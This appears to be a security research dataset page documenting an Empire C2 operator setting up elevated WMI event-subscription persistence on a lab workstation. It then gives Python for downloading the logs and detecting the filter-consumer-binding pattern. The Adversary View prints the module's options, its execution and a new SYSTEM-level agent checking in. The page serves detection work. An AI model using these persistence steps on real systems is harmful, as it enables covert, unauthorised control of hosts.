Empire Elevated WMI Eventing
Metadata
Field | Value
---|---
Contributors | Roberto Rodriguez @Cyb3rWard0g
Creation Date | 2019/05/18
Modification Date | 2020/09/20
Tactics |
Techniques |
Tags | Local WMI Eventing, WMI Event Subscriptions
Dataset Description
This dataset represents adversaries leveraging WMI subscriptions locally for persistence.
Datasets Downloads
Type | Link
---|---
Host |
Adversary View
(Empire: powershell/privesc/bypassuac_fodhelper) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:42:01 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:41:59 http
(Empire: agents) > interact 13ZK6G7M
(Empire: 13ZK6G7M) >
(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*
(Empire: powershell/persistence/elevated/wmi) > info
Name: Invoke-WMI
Module: powershell/persistence/elevated/wmi
NeedsAdmin: True
OpsecSafe: False
Language: powershell
MinLanguageVersion: 2
Background: False
OutputExtension: None
Authors:
@mattifestation
@harmj0y
@jbooz1
Description:
Persist a stager (or script) using a permanent WMI
subscription. This has a difficult detection/removal rating.
Comments:
https://github.com/mattifestation/PowerSploit/blob/master/Pe
rsistence/Persistence.psm1
Options:
Name Required Value Description
---- -------- ------- -----------
Agent True 13ZK6G7M Agent to run module on.
Listener True http Listener to use.
DailyTime False Daily time to trigger the script
(HH:mm).
AtStartup False True Switch. Trigger script (within 5
minutes) of system startup.
FailedLogon False Trigger script with a failed logon
attempt from a specified user
SubName True Updater Name to use for the event subscription.
ExtFile False Use an external file for the payload
instead of a stager.
Cleanup False Switch. Cleanup the trigger and any
script from specified location.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT
[*] Agent 13ZK6G7M tasked with task ID 1
[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi
(Empire: powershell/persistence/elevated/wmi) >
WMI persistence established using listener http with OnStartup WMI subsubscription trigger.
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) >
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent PYA28EDF checked in
[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to PYA28EDF at 172.18.39.5
(Empire: powershell/persistence/elevated/wmi) >
(Empire: powershell/persistence/elevated/wmi) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
28BNF7RH ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5392 5/0.0 2020-09-04 20:31:17 http
W2TBCPHU ps 172.18.39.5 WORKSTATION5 THESHIRE\pgustavo powershell 5584 5/0.0 2020-09-04 20:43:48 http
13ZK6G7M ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 5676 5/0.0 2020-09-04 20:43:48 http
PYA28EDF ps 172.18.39.5 WORKSTATION5 *THESHIRE\SYSTEM powershell 7480 5/0.0 2020-09-04 20:49:29 http
(Empire: agents) > interact PYA28EDF
(Empire: PYA28EDF) > shell whoami
[*] Tasked PYA28EDF to run TASK_SHELL
[*] Agent PYA28EDF tasked with task ID 1
(Empire: PYA28EDF) >
nt authority\system
..Command execution completed.
(Empire: PYA28EDF) >
(Empire: PYA28EDF) >
Explore Datasets
Download & Decompress Dataset
import requests
from zipfile import ZipFile
from io import BytesIO

# Zipped newline-delimited JSON export of this dataset in the Security-Datasets repository
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail early instead of unzipping an error page
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# Extract the single JSON file in the archive and keep its local path for the next cell
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File
import pandas as pd

# One JSON event per line, so read it as newline-delimited JSON
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events
# Count events per log channel, most populated channel first
df.groupby(['Channel']).size().sort_values(ascending=False)
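The channel count above shows which logs the dataset contains; the next step a defender takes is to pull out the events that record a permanent WMI subscription being built. The following is an added example, not code from the page or from the Security-Datasets project. It uses only the standard library so it runs without pandas, and works over a few constructed sample records in the dataset's newline-delimited JSON shape: only the `Channel` field is documented on this page, so `EventID`, `Hostname` and `Message` are assumed field names. Sysmon event IDs 19, 20 and 21 record creation of a `__EventFilter`, an `__EventConsumer` and their `__FilterToConsumerBinding`; Microsoft-Windows-WMI-Activity/Operational event 5861 records the binding as seen by the WMI service. The subscription name `Updater` is the module's default `SubName` from the Adversary View.

```python
import json
from collections import Counter

# Event IDs that record the three parts of a permanent WMI event subscription.
# Sysmon 19/20/21: WmiEventFilter, WmiEventConsumer, WmiEventConsumerToFilter.
# WMI-Activity 5861: the WMI service bound a consumer to a filter.
WMI_SUBSCRIPTION_EVENTS = {
    "Microsoft-Windows-Sysmon/Operational": {19, 20, 21},
    "Microsoft-Windows-WMI-Activity/Operational": {5861},
}

# Constructed sample records (not taken from the real dataset). Field names other
# than "Channel" are assumptions about the dataset schema.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1,
     "Hostname": "WORKSTATION5", "Message": "Process Create: powershell.exe"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 19,
     "Hostname": "WORKSTATION5", "Message": "WmiEventFilter activity detected: Name: Updater"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 20,
     "Hostname": "WORKSTATION5", "Message": "WmiEventConsumer activity detected: Name: Updater"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 21,
     "Hostname": "WORKSTATION5", "Message": "WmiEventConsumerToFilter activity detected"},
    {"Channel": "Microsoft-Windows-WMI-Activity/Operational", "EventID": 5861,
     "Hostname": "WORKSTATION5", "Message": "Namespace = //./root/subscription; Eventfilter = Updater"},
    {"Channel": "Security", "EventID": 4688,
     "Hostname": "WORKSTATION5", "Message": "A new process has been created."},
])


def parse_events(ndjson):
    """Parse newline-delimited JSON into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in ndjson.splitlines() if line.strip()]


def channel_counts(events):
    """Same view as the pandas groupby above: number of events per channel."""
    return Counter(ev.get("Channel") for ev in events)


def wmi_subscription_events(events):
    """Return events whose channel/ID pair marks WMI subscription creation, in log order."""
    hits = []
    for ev in events:
        wanted = WMI_SUBSCRIPTION_EVENTS.get(ev.get("Channel"), set())
        if int(ev.get("EventID", -1)) in wanted:
            hits.append(ev)
    return hits


def hosts_with_full_chain(events):
    """Hosts where Sysmon saw filter, consumer and binding (19, 20 and 21).

    A single 19 or 20 can be legitimate administration; all three on one host
    within the dataset is the pattern produced by a persistence install.
    """
    seen = {}
    for ev in events:
        if ev.get("Channel") == "Microsoft-Windows-Sysmon/Operational":
            seen.setdefault(ev.get("Hostname"), set()).add(int(ev["EventID"]))
    return sorted(host for host, ids in seen.items() if {19, 20, 21} <= ids)


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    print(channel_counts(events))
    for ev in wmi_subscription_events(events):
        print(ev["Channel"], ev["EventID"], ev["Message"])
    print("hosts with full subscription chain:", hosts_with_full_chain(events))
```

To run the same logic on the downloaded dataset, replace `SAMPLE_EVENTS` with the contents of `datasetJSONPath` (or apply the `WMI_SUBSCRIPTION_EVENTS` lookup as a boolean mask on `df`); the grouping by host is what separates a one-off consumer creation from the filter-consumer-binding triple that a persistence install leaves behind.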